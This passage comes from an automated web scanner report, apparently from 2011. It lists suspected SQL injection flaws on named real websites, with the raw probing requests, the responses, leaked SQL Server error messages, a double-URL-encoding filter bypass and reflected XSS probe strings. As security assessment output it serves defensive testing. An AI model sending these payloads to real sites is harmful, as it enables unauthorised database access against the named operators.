Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=014038288'%20or%201%3d1--%20&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1
Host: as.casalemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 03 May 2011 15:41:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:59 GMT
Content-Length: 482
Connection: close

document.write('<iframe id="cmif4-4136752264" src="http://cdn.optmd.com/blank.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no" allowtransparency="true" onload="var if1 = document.getElementById(\'cmif4-4136752264\'); if (if1.src == \'http://cdn.optmd.com/blank.html\') {if1.src=\'http://ad.doubleclick.net/adi/N5685.126265.1877228746421/B3560676.7;sz=300x250;click0=http://c.casalemedia.com/c/4/1/77336/;ord=0008986600\';}"></iframe>');

Request 2

GET /j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=014038288'%20or%201%3d2--%20&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1
Host: as.casalemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
Expires: Tue, 03 May 2011 15:41:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:59 GMT
Content-Length: 469
Connection: close

document.write('<iframe id="cmif4-3550049546" src="http://cdn.optmd.com/blank.html" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no" allowtransparency="true" onload="var if1 = document.getElementById(\'cmif4-3550049546\'); if (if1.src == \'http://cdn.optmd.com/blank.html\') {if1.src=\'http://ad.doubleclick.net/adi/N4375.Casale/B5142683.29;sz=300x250;click0=http://c.casalemedia.com/c/4/1/85037/;ord=0008986063\';}"></iframe>');

1.4. http://tag.contextweb.com/TagPublish/getad.aspx [tl parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The tl parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the tl parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1'&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response 1

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Content-Length: 1183
Date: Tue, 03 May 2011 15:42:02 GMT
Connection: close
Set-Cookie: C2W4=CT-USR; expires=Tue, 31-May-2011 15:42:02 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var strCreative=''
+ '<img src=http://media.contextweb.com/creatives/defaults/300x250.gif height=250 border=0 width=300 alt="There is an error in the ad tag code."><!--ERROR_TAG(id=cw-app118_If00MivX
...[SNIP]...

Request 2

GET /TagPublish/getad.aspx?01AD=30bJhJdVES12avFPxQG7RVt7LtS_3h86E4ESPmcVEzzZpFtKyX64ldQ&01RI=927EA66A3E77DF3&01NA=na&tagver=1&ca=VIEWAD&cp=503597&ct=94417&cf=300X250&cn=1&rq=1&dw=300&cwu=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1&mrnd=69691697&if=1&tl=-1''&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-1; cw=cw

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB29
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2786
Date: Tue, 03 May 2011 15:42:03 GMT
Connection: close
Set-Cookie: C2W4=CT-USR; expires=Tue, 31-May-2011 15:42:02 GMT; path=/; domain=.contextweb.com
Set-Cookie: V=31zUofH1ZIBx; domain=.contextweb.com; expires=Thu, 03-May-2012 15:42:03 GMT; path=/
Set-Cookie: 503597_3_94417=1304437323738; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Wed, 04-May-2011 04:00:00 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var strCreative=''
+ '<!-- begin ad tag -->\n'
+ '<script type="text/javascript">\n'
+ '//<![CDATA[\n'
+ 'ord=Math.random()*10000000000000000;\n'
+ 'document.write(\'<script type="text/javasc
...[SNIP]...

1.5. http://tag.contextweb.com/TagPublish/getjs.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish%2527/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response 1

HTTP/1.1 404 Not Found
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 970
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:50 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:50 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html><head><title>GlassFish v3 - Error report</title><style type="text/css"><!--H1 {font-f
...[SNIP]...

Request 2

GET /TagPublish%2527%2527/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response 2

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:50 GMT; path=/; domain=.contextweb.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Content-Length: 37

<html><body>Bad Request</body></html>

1.6. http://www.aiche.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aiche.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=fhuuwaqhnsd0cfemhcqgev45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94639

Error occured in UrlAliasContentIDLookUp : System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string 'Sitemap/index.aspx?404;http://www.aiche.org:80/favicon.ico''.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at Sys
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=o3r0yb30w3ot4x45cfuuor55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <head><title>
   AIChE - Sitemap
</title><meta http-equiv="Content
...[SNIP]...

1.7. http://www.aiche.org/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aiche.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=uw5fjq55xit21l55sew1sn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94608

Error occured in UrlAliasContentIDLookUp : System.Data.SqlClient.SqlException: Incorrect syntax near '='.
Unclosed quotation mark after the character string ''.
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at System.Data.SqlClient.SqlInternalConnection.OnError(SqlExcepti
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&dm=www.aiche.org&SiteLanguage=1033; path=/
Set-Cookie: ASP.NET_SessionId=ulrrd555uggy1qfzv4z5jr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <head><title>
   AIChE - Sitemap
</title><meta http-equiv="Content
...[SNIP]...

1.8. http://www.amateurfarm.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.amateurfarm.net
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 63872318'%20or%201%3d1--%20 and 63872318'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico63872318'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:27:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 534
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico63872318' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

Request 2

GET /favicon.ico63872318'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:27:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 530
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico63872318' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

1.9. http://www.amateurfarm.net/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.amateurfarm.net
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10480672%20or%201%3d1--%20 and 10480672%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?110480672%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:26:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 515
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

Request 2

GET /favicon.ico?110480672%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurfarm.net
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:26:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 511
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.amateurfarm.net Port 80</address>
</body></html>

1.10. http://www.divorcemag.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.divorcemag.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:54 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=354213325c0864e086f273119a41caa9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 60

Query to the database server failed, sorry. Try again later.

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:21:54 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=96638fd64097146eda9c1968b6ecdd96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

1.11. http://www.divorcemag.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.divorcemag.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:52 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=eb5be03b0b19be852962b628233873e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 60

Query to the database server failed, sorry. Try again later.

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:21:52 GMT
Server: Apache/1.3.39 (Unix) mod_ssl/2.8.30 OpenSSL/0.9.7e-p1
Set-Cookie: PSESS=9f178e93370297b3301f3e79fb144831; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

1.12. http://www.edison.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.edison.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.edison.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:26:11 GMT
Content-Length: 760
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSTBBRAT=PGCIEEICALMNEGGIBIDNCKFA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML dir=ltr>
<HEAD>
<style>
a:link            {font:8pt/11pt verdana; color:FF0000}
a:visited        {font:8pt/11pt verdana; color:#4e4e4e}
</style>
...[SNIP]...
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'favicon.ico''.</font>
...[SNIP]...

1.13. http://www.expertsatellite.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.expertsatellite.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12342703%20or%201%3d1--%20 and 12342703%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?112342703%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertsatellite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 11:05:24 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
ETag: "13e-48bf77beaa1c0"
Last-Modified: Thu, 22 Jul 2010 10:35:59 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... ................................Y........K.....................................................................................................................""""""""""""""""!...."."!.""!.."!...".""!.""!.."!...."."""""""""................................................................

Request 2

GET /favicon.ico?112342703%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertsatellite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2
